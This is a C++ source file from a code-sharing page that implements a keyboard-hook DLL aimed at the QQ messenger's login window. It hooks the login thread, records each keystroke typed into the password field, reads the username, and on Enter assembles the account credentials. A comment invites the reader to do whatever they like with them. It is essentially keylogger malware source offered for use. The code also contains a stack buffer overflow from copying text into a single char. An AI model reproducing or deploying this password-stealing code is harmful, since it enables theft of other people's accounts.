📄 qqhook.cpp
字号:
//****************************************
// 作者:∮明天去要饭
// QICQ:305725744
// MSN:kgdiwss@hotmail.com
// 黑客编程群:2585270
// Blog:http://blog.csdn.net/kgdiwss
//****************************************
#include <windows.h>
#include <stdio.h>
#include "QQHook.h"
//定义了QQHookLIB,QQHookLIB_API会被解释成__declspec(dllexport)
//#define QQHookLIB
//共享数据段
#pragma data_seg("QQSpyShare")
HWND g_hLoginWindowWnd = NULL; //QQ主窗口句柄
//HINSTANCE hDll = NULL; //QQHook.dll模块句柄
HHOOK g_hMessageHook = NULL; //消息钩子句柄
HHOOK g_hKeyBoardHook = NULL; //键盘钩子句柄
HWND hQQLoginUserName = NULL;
HWND hQQLoginUserPwd = NULL;
HWND hQQLoginButton = NULL;
//
//char buf[250] = {0};
//ZeroMemory(cUserPwd, 250);
#pragma data_seg()
//#pragma comment(linker,"/Section:QQSpyShare,RWS")
//键盘钩子回调函数
//LRESULT CALLBACK MessageProc(int ncode,WPARAM wParam,LPARAM lParam);
//键盘钩子回调函数
LRESULT CALLBACK KeyBoardProc(int ncode,WPARAM wParam,LPARAM lParam);
BOOL APIENTRY DllMain(HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
/*
//消息钩子
BOOL WINAPI SetMessageHook(BOOL bInstall,
HINSTANCE hDll,
HWND hLoginWindow,
DWORD dwCreateWindowProcessID)
{
if(bInstall)
{
/*
g_hMessageHook = SetWindowsHookEx(
WH_CALLWNDPROC,
MessageProc,
hDll,
dwCreateWindowProcessID);
if(g_hMessageHook == NULL)
{
return FALSE;
}
*/
// printf("消息钩子安装成功!\n");
//printf("登陆窗口句柄:%x\n",g_hLoginWindowWnd);
//printf("g_hLoginWindowWnd的值为:%x\n",g_hLoginWindowWnd);
//::MessageBox(NULL,"安装消息钩子成功!","消息钩子:",MB_OK);
// return TRUE;
//}
//else
//{
/*
if(UnhookWindowsHookEx(g_hMessageHook) == FALSE)
{
printf("消息钩子安装失败!");
return FALSE;
}
*/
//printf("消息钩子卸载成功!");
//return FALSE;
//}
//return TRUE;
//}
//键盘钩子
//安装键盘钩子函数
BOOL QQHookLIB_API SetKeyBoardHook(BOOL bInstall,
HMODULE hDll,
HWND hLoginWindow,
HWND hUserName,
HWND hUserPwd,
HWND hLoginButton,
DWORD dwCreateWindowProcessID)
{
BOOL bResult;
if(bInstall)
{
//保存用户名的句柄
hQQLoginUserName = hUserName;
//保存密码的句柄
hQQLoginUserPwd = hUserPwd;
//保存登陆QQ按钮的句柄
hQQLoginButton = hLoginButton;
//保存登陆窗口的句柄
g_hLoginWindowWnd = hLoginWindow;
//登陆窗口的主线程,安装钩子的时候要用
DWORD dwCreateLoginWindowThreadId;
dwCreateLoginWindowThreadId = GetWindowThreadProcessId(hLoginWindow,NULL);
//在登陆窗口主线程上安装钩子
g_hKeyBoardHook = SetWindowsHookEx(
WH_KEYBOARD, //安装键盘钩子
(HOOKPROC)KeyBoardProc, //键盘钩子回调函数
hDll, //QQHook.dll模块句柄
dwCreateLoginWindowThreadId); //登陆窗口的主线程
if(g_hKeyBoardHook == NULL)
{
printf("键盘钩子安装失败!");
return FALSE;
}
else
{
printf("键盘钩子安装成功了!");
return TRUE;
}
}
else
{
//卸载钩子
bResult = UnhookWindowsHookEx(g_hKeyBoardHook);
if(bResult == TRUE)
{
printf("键盘钩子卸载成功!");
return TRUE;
}
else
{
printf("键盘钩子卸载失败!");
return FALSE;
}
}
return TRUE;
}
/*
//键盘钩子回调函数
LRESULT CALLBACK MessageProc(int ncode,
WPARAM wParam,
LPARAM lParam
)
{
//如果当前的输入焦点不在QQ登陆对话框所在的线程,则忽略。
if(GetFocus() == NULL)
{
return CallNextHookEx(g_hMessageHook, ncode, wParam, lParam);
}
return CallNextHookEx(g_hMessageHook, ncode, wParam, lParam);
}
*/
//键盘钩子回调函数
LRESULT CALLBACK KeyBoardProc(int ncode,
WPARAM wParam,
LPARAM lParam
)
{
//创建一个缓冲区保存连起来的密码
static char buf[250] = {0};
//用于保存用户名框的内容
char cUserName[10];
ZeroMemory(cUserName, 10);
//用于保存用户在密码框上的每一个按键
char cUserPwd[30];
//如果按的键是回车键
if (wParam == VK_RETURN && lParam > 0)
{
//得到用户名的值保存在cUserName中
SendMessage(hQQLoginUserName, WM_GETTEXT, 10, (LPARAM)cUserName);
}
//如果不是按回车,并且是在密码框中输入
if (lParam > 0 && wParam != VK_RETURN &&
//当前输入框为密码框
hQQLoginUserPwd == GetFocus())
{
//记下密码框中输入的字符
GetKeyNameText(lParam, cUserPwd, 30);
//以下代码是为了把每一次按的键连起来,形成一个完整的密码
static int index = 0;
if(index == 0)
{
if(strcmp(cUserPwd,"Num 1") == 0)
{
strcpy(buf,"1");
}
else if(strcmp(cUserPwd,"Num 2") == 0)
{
strcpy(buf,"2");
}
else if(strcmp(cUserPwd,"Num 3") == 0)
{
strcpy(buf,"3");
}
else if(strcmp(cUserPwd,"Num 4") == 0)
{
strcpy(buf,"4");
}
else if(strcmp(cUserPwd,"Num 5") == 0)
{
strcpy(buf,"5");
}
else if(strcmp(cUserPwd,"Num 6") == 0)
{
strcpy(buf,"6");
}
else if(strcmp(cUserPwd,"Num 7") == 0)
{
strcpy(buf,"7");
}
else if(strcmp(cUserPwd,"Num 8") == 0)
{
strcpy(buf,"8");
}
else if(strcmp(cUserPwd,"Num 9") == 0)
{
strcpy(buf,"9");
}
else if(strcmp(cUserPwd,"Num 0") == 0)
{
strcpy(buf,"0");
}
else
{
strcpy(buf,cUserPwd);
}
}
else
{
if(strcmp(cUserPwd,"Num 1") == 0)
{
strcat(buf,"1");
}
else if(strcmp(cUserPwd,"Num 2") == 0)
{
strcat(buf,"2");
}
else if(strcmp(cUserPwd,"Num 3") == 0)
{
strcat(buf,"3");
}
else if(strcmp(cUserPwd,"Num 4") == 0)
{
strcat(buf,"4");
}
else if(strcmp(cUserPwd,"Num 5") == 0)
{
strcat(buf,"5");
}
else if(strcmp(cUserPwd,"Num 6") == 0)
{
strcat(buf,"6");
}
else if(strcmp(cUserPwd,"Num 7") == 0)
{
strcat(buf,"7");
}
else if(strcmp(cUserPwd,"Num 8") == 0)
{
strcat(buf,"8");
}
else if(strcmp(cUserPwd,"Num 9") == 0)
{
strcat(buf,"9");
}
else if(strcmp(cUserPwd,"Num 0") == 0)
{
strcat(buf,"0");
}
else
{
strcat(buf,cUserPwd);
}
}
++index;
}
//如果按的是回车,将上面得到的用户名和密码连在一起显示
if (wParam == VK_RETURN && lParam > 0)
{
char cAccount;
strcpy(&cAccount,"用户名:");
strcat(&cAccount,cUserName);
strcat(&cAccount,"\n密 码:");
strcat(&cAccount,buf);
strcat(&cAccount,"\nBy:∮明天去要饭");
//cAccount中保存了用户名和密码,想怎么处理就怎么处理
MessageBox(NULL,&cAccount,"QQ帐号:",MB_OK);
return CallNextHookEx(g_hKeyBoardHook, ncode, wParam, lParam);
}
return CallNextHookEx(g_hKeyBoardHook, ncode, wParam, lParam);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -